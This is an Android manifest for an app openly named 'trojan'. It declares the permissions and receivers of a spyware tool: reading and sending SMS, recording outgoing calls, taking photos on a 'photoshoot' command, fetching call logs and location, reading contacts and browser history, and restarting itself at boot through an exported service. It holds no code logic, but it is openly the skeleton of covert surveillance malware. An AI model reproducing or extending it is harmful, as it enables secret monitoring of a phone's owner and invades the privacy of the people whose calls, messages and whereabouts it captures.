<?xml version="1.0" encoding="utf-8"?>
<manifest package="com.example.trojan"
    android:versionCode="1"
    android:versionName="1.2b" android:installLocation="internalOnly" xmlns:android="http://schemas.android.com/apk/res/android">

    <uses-sdk
        android:minSdkVersion="10"
        android:targetSdkVersion="14" />
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>

    <application
        android:label="trojan">
    <service android:name="com.example.test.MyService" 
        	 android:exported="true"/>
    <receiver android:name="com.example.test.Starter" >
        <intent-filter >
            <action android:name="android.intent.action.BOOT_COMPLETED" />
            <action android:name="com.example.test.restart"/>
        </intent-filter>
    </receiver>
        <receiver android:name=".IntentTracker" >
        <intent-filter>
            <action android:name="GetLastKnownLocation"/>
            <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            <action android:name="photoshoot"/>
            <action android:name="getcalllogs"/>
        </intent-filter>
    </receiver>
        <receiver android:name=".PhoneRecorder">
            <intent-filter>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
                
                <action android:name="stoprecord"/>
                <action android:name="startrecord"/>
                <action android:name="android.intent.action.PHONE_STATE"/>
            </intent-filter>
        </receiver>
    </application>

</manifest>
